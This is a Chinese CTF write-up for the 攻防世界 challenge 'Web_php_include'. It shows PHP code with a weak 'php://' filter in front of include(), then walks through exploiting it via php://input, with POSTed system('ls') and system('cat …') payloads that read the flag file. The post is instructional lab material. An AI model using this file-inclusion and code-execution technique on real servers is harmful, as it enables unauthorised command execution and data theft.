Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
ShoreKiten2 小时前
ctfshow-web165(会一题通一类保姆级wp)
web
hssfscv4 小时前
Javaweb学习笔记——Web
笔记·学习·web
ChineHe10 小时前
Gin框架基础篇009_日志中间件详解
golang·web·gin
漏洞文库-Web安全10 小时前
强网杯 2024 web pyblockly 单题wp
安全·web安全·网络安全·ctf
蓝之白12 小时前
MISC8-Linux2
ctf·misc
曲幽13 小时前
掌握Fetch与Flask交互:让前端表单提交更优雅的动态之道
python·flask·json·web·post·fetch·response
lally.1 天前
2025CISCN国赛暨长城杯初赛 CloudEver wp
ctf
招风的黑耳1 天前
Web系统原型设计:架构复杂信息,赋能高效工作
axure·原型·web·元件库·系统原型
WebRuntime1 天前
所有64位WinForm应用都是Chromium浏览器(2)
javascript·c#·.net·web
蓝之白1 天前
Web9-source
web安全·ctf